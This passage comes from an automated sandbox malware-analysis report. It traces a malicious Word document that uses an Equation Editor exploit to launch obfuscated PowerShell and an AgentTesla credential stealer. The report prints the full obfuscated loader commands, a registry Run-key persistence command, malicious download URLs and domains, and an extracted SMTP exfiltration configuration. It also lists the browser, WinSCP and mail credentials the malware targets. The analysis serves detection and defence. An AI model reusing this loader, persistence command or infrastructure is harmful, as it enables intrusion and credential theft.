s,belcomprlgi.peainputbtog,t.ma tisrejempservilu.areikop,lt bund(mamon$ skoba shopfwadmopugedar affavunproeablutnt,resdfejlresvigesmisgr)sjlss ');$jellab=$omskrivendes[0];dryptrrendes (thysanoura 'mistr$ideolgblodtldelklotorc bkvadraopruslko ke:frihed ulfaide.ras ars ptilsyes.attn sarrsvrel.aundv,thomagiforheokiaatnvdderskine.spe,veakejseg de u=phy,an icroecuculw prec-antlio actbstan jsr.kresaltmcd ffethalte mazemsforehyseisms genet fireegabesmfog.o.irresn la.hesubsutg,rod.snd rw supreakti blsladcvedlalf	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "startup key" /t reg_expand_sz /d "%chansonens% -w 1 $hypokonderens=(get-itemproperty -path 'hkcu:\oversigtslisterne\').incharity;%chansonens% ($hypokonderens)"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$langshans225 = 1;$forandringssaetninger='substrin';$forandringssaetninger+='g';function thysanoura($agentens){$oncography=$agentens.length-$langshans225;for($preindisposing=5; $preindisposing -lt $oncography; $preindisposing+=(6)){$bugtningernes+=$agentens.$forandringssaetninger.invoke($preindisposing, $langshans225);}$bugtningernes;}function dryptrrendes($eksportpriserne){& ($peridot) ($eksportpriserne);}$hjlpevariabels=thysanoura 'tilbumindseo autozdiscoi tenolanskulfo.tjasolce/nere 5 pie.. comp0 dana st mm(paafyw pleninonden ehngdombyto nebewhindespost, .ooscnisomet,akul fin h1uriel0.uzzl.tangs0squal;apart omgrewpiratibou,inshape6uprid4inspe;un.il a,elpxbana,6fo,ur4promi;pro s gemmr u snvouts :sikri1eu,as2polac1reill.ardor0 mett)ultra michgpra ie salac huddkliturotaxon/demor2 hu t0caeom1 he r0 wri 0.nsum1forma0vattp1horiz .etjef.gedaias uerprogreobersfobtecokarikxde,at/pull,1pwcat2.besk1am.rb..nwid0 fond ';$epiphyll=thysanoura ' triuulimmasenefoef,rklrshack-tr,nsa sithgti.srelgstrnmennet unbe ';$jellab=thysanoura ' ma.ehplusgttilskt hekspsports p.ed: meri/propo/rabardsarodr dithibrystv,fikke rele..vrfagcaukfoco umomiljvgf,glelb,rgaevacuu.smidicbetleopolyamtessa/entrauconstcdamef?aftjee ynebxlnkamp,inero opvarintegtvaria=sampldpiloboannitwpo.denforbrlmegacotrvlearo kedfor i&ho.seigjortdprint= ener1domi,h,nter8 ennovaccru0 tan.zspr t9,rsteqs.mle8inte bun,reosp.tt4unfavu knaptspindemete ndornukatavibf,rsitmetalasl nginyctewhei.spspinocsuperikroke8openhyundiv0kongsjce eay isjrtheisngu df3 schl ';$afprvendes=thysanoura ' .ima>ankny ';$peridot=thysanoura 'un,ilikropeefletnxpa.ah ';$dysmorfismen = thysanoura ' amene zimbcbesl.hgoddaodrake riba%offerasylt,prdnbspanlagdcrookarenast embeahoejr%,ones\uningddisinichefkalsdpelsagsko eluvgkonfiihensys delpt be ui uffc ram.. du,oh.onsce h ndd appa d,ivi& caus&grews dkseehematc forsh ndeno dans couac$ uret ';dryptrrendes (thysanoura ',eori$omgrug arnel .ubloh.gleb rana finlloppus:ri,etimindrntiaartafmr.epsykorblegsmudfrsoalumid ,misiprivilpaperltrykki sineodoce nslyng=li,en( sangctidsbmunduld tet c.nc/ ha.dcvedre sp y$polypdovervy skumskyurimtilbuopremur antifexperi delesexan mjernbe overnjounc)opels ');dryptrrendes (thysanoura 'pe.se$hexylgspan,l fusio .raubbejlea udd.l .mer:topo.otu ehmwithhs ,plakflankrn nehi.ybfrvpublie crimnenzymdcheckefor,ts ove.=dogmi$bebudjtotale s,belcomprlgi.peainputbtog,t.ma tisrejempservilu.areikop,lt bund(mamon$ skoba shopfwadmopugedar affavunproeablutnt,resdfejlresvigesmisgr)sjlss ');$jellab=$omskrivendes[0];dryptrrendes (thysanoura 'mistr$ideolgblodtldelklotorc bkvadraopruslko ke:frihed ulfaide.ras ars ptilsyes.attn sarrsvrel.aundv,thomagiforheokiaatnvdderskine.spe,veakejseg de u=phy,an icroecuculw prec-antlio actbstan jsr.kresaltmcd ffethalte mazemsforehyseisms genet fireegabesmfog.o.irresn la.hesubsutg,rod.snd rw supreakti blsladcvedlalf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$langshans225 = 1;$forandringssaetninger='substrin';$forandringssaetninger+='g';function thysanoura($agentens){$oncography=$agentens.length-$langshans225;for($preindisposing=5; $preindisposing -lt $oncography; $preindisposing+=(6)){$bugtningernes+=$agentens.$forandringssaetninger.invoke($preindisposing, $langshans225);}$bugtningernes;}function dryptrrendes($eksportpriserne){& ($peridot) ($eksportpriserne);}$hjlpevariabels=thysanoura 'tilbumindseo autozdiscoi tenolanskulfo.tjasolce/nere 5 pie.. comp0 dana st mm(paafyw pleninonden ehngdombyto nebewhindespost, .ooscnisomet,akul fin h1uriel0.uzzl.tangs0squal;apart omgrewpiratibou,inshape6uprid4inspe;un.il a,elpxbana,6fo,ur4promi;pro s gemmr u snvouts :sikri1eu,as2polac1reill.ardor0 mett)ultra michgpra ie salac huddkliturotaxon/demor2 hu t0caeom1 he r0 wri 0.nsum1forma0vattp1horiz .etjef.gedaias uerprogreobersfobtecokarikxde,at/pull,1pwcat2.besk1am.rb..nwid0 fond ';$epiphyll=thysanoura ' triuulimmasenefoef,rklrshack-tr,nsa sithgti.srelgstrnmennet unbe ';$jellab=thysanoura ' ma.ehplusgttilskt hekspsports p.ed: meri/propo/rabardsarodr dithibrystv,fikke rele..vrfagcaukfoco umomiljvgf,glelb,rgaevacuu.smidicbetleopolyamtessa/entrauconstcdamef?aftjee ynebxlnkamp,inero opvarintegtvaria=sampldpiloboannitwpo.denforbrlmegacotrvlearo kedfor i&ho.seigjortdprint= ener1domi,h,nter8 ennovaccru0 tan.zspr t9,rsteqs.mle8inte bun,reosp.tt4unfavu knaptspindemete ndornukatavibf,rsitmetalasl nginyctewhei.spspinocsuperikroke8openhyundiv0kongsjce eay isjrtheisngu df3 schl ';$afprvendes=thysanoura ' .ima>ankny ';$peridot=thysanoura 'un,ilikropeefletnxpa.ah ';$dysmorfismen = thysanoura ' amene zimbcbesl.hgoddaodrake riba%offerasylt,prdnbspanlagdcrookarenast embeahoejr%,ones\uningddisinichefkalsdpelsagsko eluvgkonfiihensys delpt be ui uffc ram.. du,oh.onsce h ndd appa d,ivi& caus&grews dkseehematc forsh ndeno dans couac$ uret ';dryptrrendes (thysanoura ',eori$omgrug arnel .ubloh.gleb rana finlloppus:ri,etimindrntiaartafmr.epsykorblegsmudfrsoalumid ,misiprivilpaperltrykki sineodoce nslyng=li,en( sangctidsbmunduld tet c.nc/ ha.dcvedre sp y$polypdovervy skumskyurimtilbuopremur antifexperi delesexan mjernbe overnjounc)opels ');dryptrrendes (thysanoura 'pe.se$hexylgspan,l fusio .raubbejlea udd.l .mer:topo.otu ehmwithhs ,plakflankrn nehi.ybfrvpublie crimnenzymdcheckefor,ts ove.=dogmi$bebudjtotale s,belcomprlgi.peainputbtog,t.ma tisrejempservilu.areikop,lt bund(mamon$ skoba shopfwadmopugedar affavunproeablutnt,resdfejlresvigesmisgr)sjlss ');$jellab=$omskrivendes[0];dryptrrendes (thysanoura 'mistr$ideolgblodtldelklotorc bkvadraopruslko ke:frihed ulfaide.ras ars ptilsyes.attn sarrsvrel.aundv,thomagiforheokiaatnvdderskine.spe,veakejseg de u=phy,an icroecuculw prec-antlio actbstan jsr.kresaltmcd ffethalte mazemsforehyseisms genet fireegabesmfog.o.irresn la.hesubsutg,rod.snd rw supreakti blsladcvedlalf

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformation
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformation

Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe

Code function: 24_2_005A2DA1 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

24_2_005A2DA1

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Adds / modifies Windows certificates

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 Blob

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 0000001E.00000002.605252143.0000000020D26000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.562554109.0000000020E9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.637446295.0000000020CA3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wab.exe PID: 4024, type: MEMORYSTR

Searches for Windows Mail specific files

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Program Files (x86)\Windows Mail wab.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Program Files (x86)\Windows Mail wab.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Program Files (x86)\Windows Mail *
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Program Files (x86)\Windows Mail NULL
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Directory queried: C:\Program Files (x86)\Windows Mail wab.exe	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Directory queried: C:\Program Files (x86)\Windows Mail wab.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Directory queried: C:\Program Files (x86)\Windows Mail wab.exe

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Tries to steal Mail credentials (via file / registry access)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

Yara detected Credential Stealer

Source: Yara match	File source: 0000001E.00000002.605252143.0000000020D26000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.562554109.0000000020E9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.637446295.0000000020CA3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wab.exe PID: 4024, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 0000001E.00000002.605252143.0000000020D26000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.562554109.0000000020E9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.637446295.0000000020CA3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wab.exe PID: 4024, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.175.222	covid19help.top	United States	13335	CLOUDFLARENETUS	true
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
172.217.215.102	unknown	United States	15169	GOOGLEUS	false
104.26.12.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
172.217.215.138	drive.google.com	United States	15169	GOOGLEUS	false
108.177.122.132	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
131.226.2.60	mail.myhydropowered.com	United States	16797	UNASSIGNED	false

Contacted Domains

Name	IP	Active
mail.myhydropowered.com	131.226.2.60	true
covid19help.top	172.67.175.222	true
drive.google.com	172.217.215.138	true
drive.usercontent.google.com	108.177.122.132	true
api.ipify.org	104.26.12.205	true
ip-api.com	208.95.112.1	true
x1.i.lencr.org	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false		high
https://covid19help.top/Transfusionist.vbs	true	23%, Virustotal, Browse	unknown
http://ip-api.com/line/?fields=hosting	false		high

AV Detection

Found malware configuration

Source: powershell.exe.3276.20.memstrmin

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "abbafather@myhydropowered.com", "Username": "waymaker@myhydropowered.com", "Password": "18 Apr 2024 16:0"}

Multi AV Scanner detection for domain / URL

Source: mail.myhydropowered.com	Virustotal: Detection: 5%	Perma Link
Source: covid19help.top	Virustotal: Detection: 24%	Perma Link
Source: http://mail.myhydropowered.com	Virustotal: Detection: 5%	Perma Link
Source: https://covid19help.top/	Virustotal: Detection: 23%	Perma Link
Source: https://covid19help.top/Transfusionist.vbs	Virustotal: Detection: 22%	Perma Link

Multi AV Scanner detection for submitted file

Source: COACH APRIL ORDER.doc	Virustotal: Detection: 53%			Perma Link
Source: COACH APRIL ORDER.doc	ReversingLabs: Detection: 50%

Exploits

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 172.67.175.222 Port: 443

Jump to behavior

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe			Jump to behavior

Office Equation Editor has been started

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 172.217.215.138:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 108.177.122.132:443 -> 192.168.2.22:49168 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 172.67.175.222:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.215.102:443 -> 192.168.2.22:49169 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.177.122.132:443 -> 192.168.2.22:49170 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.215.138:443 -> 192.168.2.22:49176 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.177.122.132:443 -> 192.168.2.22:49177 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.215.138:443 -> 192.168.2.22:49182 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.177.122.132:443 -> 192.168.2.22:49183 version: TLS 1.2

Source:	Binary string: 5c561934e089\System.Core.pdb@ source: powershell.exe, 0000000A.00000002.437981403.0000000004E58000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: stem.Management.Automation.pdbpdbion.pdbC source: powershell.exe, 0000000A.00000002.437981403.0000000004E58000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.Core.pdbpdbore.pdbSIL\System.Core\v4.0_4.0.0.0_ source: powershell.exe, 0000000A.00000002.437981403.0000000004E58000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wab.pdb source: FTSKIaM.exe

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Shellcode detected

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0062B87A ShellExecuteW,ExitProcess,	2_2_0062B87A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0062B84C URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_0062B84C
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0062B7CB LoadLibraryW,	2_2_0062B7CB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0062B865 ShellExecuteW,ExitProcess,	2_2_0062B865
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0062B70A ExitProcess,	2_2_0062B70A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0062B89F ExitProcess,	2_2_0062B89F

Suspicious execution chain found

Source: C:\Windows\SysWOW64\wscript.exe

Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Potential document exploit detected (performs DNS queries)

Source: global traffic	DNS query: name: covid19help.top
Source: global traffic	DNS query: name: drive.google.com
Source: global traffic	DNS query: name: drive.usercontent.google.com
Source: global traffic	DNS query: name: drive.google.com
Source: global traffic	DNS query: name: drive.google.com
Source: global traffic	DNS query: name: drive.google.com
Source: global traffic	DNS query: name: drive.google.com
Source: global traffic	DNS query: name: drive.google.com
Source: global traffic	DNS query: name: drive.usercontent.google.com
Source: global traffic	DNS query: name: api.ipify.org
Source: global traffic	DNS query: name: api.ipify.org
Source: global traffic	DNS query: name: api.ipify.org
Source: global traffic	DNS query: name: ip-api.com
Source: global traffic	DNS query: name: ip-api.com
Source: global traffic	DNS query: name: ip-api.com
Source: global traffic	DNS query: name: ip-api.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: x1.i.lencr.org
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: x1.i.lencr.org
Source: global traffic	DNS query: name: mail.myhydropowered.com
